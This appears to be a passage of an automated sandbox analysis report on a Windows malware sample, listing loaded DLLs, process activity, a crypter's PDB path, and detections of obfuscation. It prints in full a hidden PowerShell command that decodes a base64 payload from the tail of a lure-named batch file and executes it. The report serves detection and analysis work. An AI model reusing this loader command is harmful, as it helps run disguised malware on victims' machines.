Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: C:\Users\PhantomShark\Documents\Coding Projects\Marrow_Crypter\Net_Loader\Net_Loader\obj\Release\Net_Loader.pdb source: PING.EXE, 00000008.00000002.3332146914.00000000068C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.pdbhP source: powershell.exe, 00000002.00000002.991277571.000001BEBEC5E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.pdb source: powershell.exe, 00000002.00000002.991277571.000001BEBEC5E000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 8.2.PING.EXE.68c0000.0.raw.unpack, Z1.cs

.Net Code: L System.Reflection.Assembly.Load(byte[])

PowerShell case anomaly found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF936874393 pushad ; iretd	2_2_00007FF936874419
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_00770858 push ds; ret	8_2_00770859
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_007714B8 push ss; ret	8_2_007714C0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068D3EDE push es; ret	8_2_068D3EF0
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068D3EF1 push es; ret	8_2_068D3F6C
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068D3E3D push es; ret	8_2_068D3ED4
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068D3F6D push es; ret	8_2_068D4004
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068D3CD1 push es; ret	8_2_068D3D0C
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068D3DA5 push es; ret	8_2_068D3E3C
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068D3D0D push es; ret	8_2_068D3DA4
Source: C:\Windows\SysWOW64\PING.EXE	Code function: 8_2_068D6950 push es; ret	8_2_068D6960

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.dll

Jump to dropped file

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
